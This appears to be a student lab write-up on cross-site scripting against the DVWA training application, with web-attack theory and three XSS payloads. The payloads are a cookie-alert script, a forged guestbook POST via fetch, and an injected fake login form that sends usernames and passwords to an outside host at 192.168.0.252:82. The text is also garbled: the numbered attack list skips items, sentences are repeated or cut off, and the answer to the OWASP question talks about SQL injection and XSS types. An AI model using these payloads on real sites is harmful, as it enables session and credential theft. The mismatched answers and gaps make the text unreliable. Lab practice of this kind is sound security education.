Professional Documents
Culture Documents
Objective:
1. Understanding Cross-site scripting (XSS).
2. Understanding and exploring the concept of DVWA & Burp Suite.
3. Exploration of vulnerabilities for web based applications through XSS attack using
DVWA & Burp Suite.
4. In this experiment, we will be do the following:
(a) XSS Attack 1: Hijacking the user’s session
(b) XSS Attack 2: Perform unauthorized activities.
(c) XSS Attack 3: Phishing to steal user credentials.
(d) XSS Attack 4: Capture the keystrokes by injecting a keylogger.
(e) XSS Attack 5: Stealing sensitive information.
CO Outcome
Web application security (also known as Web AppSec) is the idea of building websites
to function as expected, even when they are under attack. The concept involves a
collection of security controls engineered into a Web application to protect its assets
from potentially malicious agents. Web applications, like all software, inevitably
contain defects. Some of these defects constitute actual vulnerabilities that can be
exploited, introducing risks to organizations. Web application security defends against
such defects. It involves leveraging secure development practices and implementing
security measures throughout the software development life cycle (SDLC), ensuring
that design-level flaws and implementation-level bugs are addressed.
Related Theory: -
1. SQL Injection (SQLi): Attackers inject malicious SQL queries into input fields,
exploiting vulnerabilities in the application's SQL database. This allows them to access,
modify, or delete data, or even execute administrative operations.
2. Cross-Site Scripting (XSS): Attackers inject malicious scripts into web pages viewed
by other users. These scripts can steal session cookies, redirect users to malicious sites,
or deface websites. XSS can be stored (persistent) or reflected (non-persistent).
6. Path Traversal: Attackers exploit insecure file management mechanisms to access files
or directories that are outside of the web application's root directory. This can lead to
unauthorized access to sensitive system files or data.
7. XML External Entity (XXE) Injection: Attackers exploit vulnerabilities in XML parsers to
include external entities in XML documents processed by the application. This can lead to
information disclosure, server-side request forgery (SSRF), or denial of service (DoS)
attacks.
9. Insecure Direct Object References (IDOR): Attackers exploit vulnerabilities that allow
them to manipulate object references (e.g., file paths, database keys) to access
unauthorized resources or perform unauthorized actions.
10. Server-Side Request Forgery (SSRF): Attackers trick the server into making malicious
requests on their behalf, often to internal or external systems. This can lead to data theft,
service disruption, or unauthorized access to sensitive resources.
11. Remote Code Execution (RCE): Attackers exploit vulnerabilities in web applications to
execute arbitrary code on the server. This can lead to complete compromise of the server,
data theft, or unauthorized access.
12. Brute Force Attacks: Attackers attempt to guess usernames and passwords by
systematically trying different combinations until they find the correct credentials. This can
be mitigated by implementing account lockout mechanisms and using strong
authentication methods.
These are just some of the many attacks that can threaten the security of web
applications. It's essential for developers to be aware of these threats and employ
appropriate security measures to mitigate them. Regular security audits, code reviews, and
penetration testing can help identify and address vulnerabilities in web applications.
Additionally, staying informed about emerging threats and best practices in web
application security is crucial for maintaining robust defenses.
XSS attacks
● Reflected XSS, where the malicious script comes from the current HTTP
request.
Stored XSS (also known as persistent or second-order XSS) arises when an application
receives data from an untrusted source and includes that data within its later HTTP
responses in an unsafe way.
The data in question might be submitted to the application via HTTP requests; for
example, comments on a blog post, user nicknames in a chat room, or contact details on
a customer order. In other cases, the data might arrive from other untrusted sources; for
example, a webmail application displaying messages received over SMTP, a marketing
application displaying social media posts, or a network monitoring application
displaying packet data from network traffic.
DOM-based XSS (also known as DOM XSS) arises when an application contains some
client-side JavaScript that processes data from an untrusted source in an unsafe way,
usually by writing the data back to the DOM.
Cross-site scripting prevention can generally be achieved via two layers of defense:
Preventing cross-site scripting is trivial in some cases but can be much harder
depending on the complexity of the application and the ways it handles
user-controllable data.
● Filter input on arrival. At the point where user input is received, filter as strictly
as possible based on what is expected or valid input.
Reflected XSS
Unset
http://localhost:81/vulnerabilities/xss_r/?name=<script>alert(do
cument.cookie)</script>
<script>
fetch('http://localhost:81/vulnerabilities/xss_s/', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
body: 'txtName=xss&mtxMessage=xss&btnSign=Sign+Guestbook'
})
</script>
Unset
http://localhost:81/vulnerabilities/xss_r/?name=<h3>Please login
to proceed</h3> <form
action=http://192.168.0.252:82>Username:<br><input
type="username" name="username"></br>Password:<br><input
type="password" name="password"></br><br><input type="submit"
value="Logon"></br>
Post-Lab Questions:
1. What is OWASP? List the latest web security application risks by OWASP.
Ans: To defend against SQL injections you need to implement a few secure coding
practices and run any vulnerability assessment tool. First of all:
● Reflected XSS, where the malicious script comes from the current
HTTP request.
● Stored XSS, where the malicious script comes from the website's
database.
● DOM-based XSS, where the vulnerability exists in client-side code
rather than server-side code.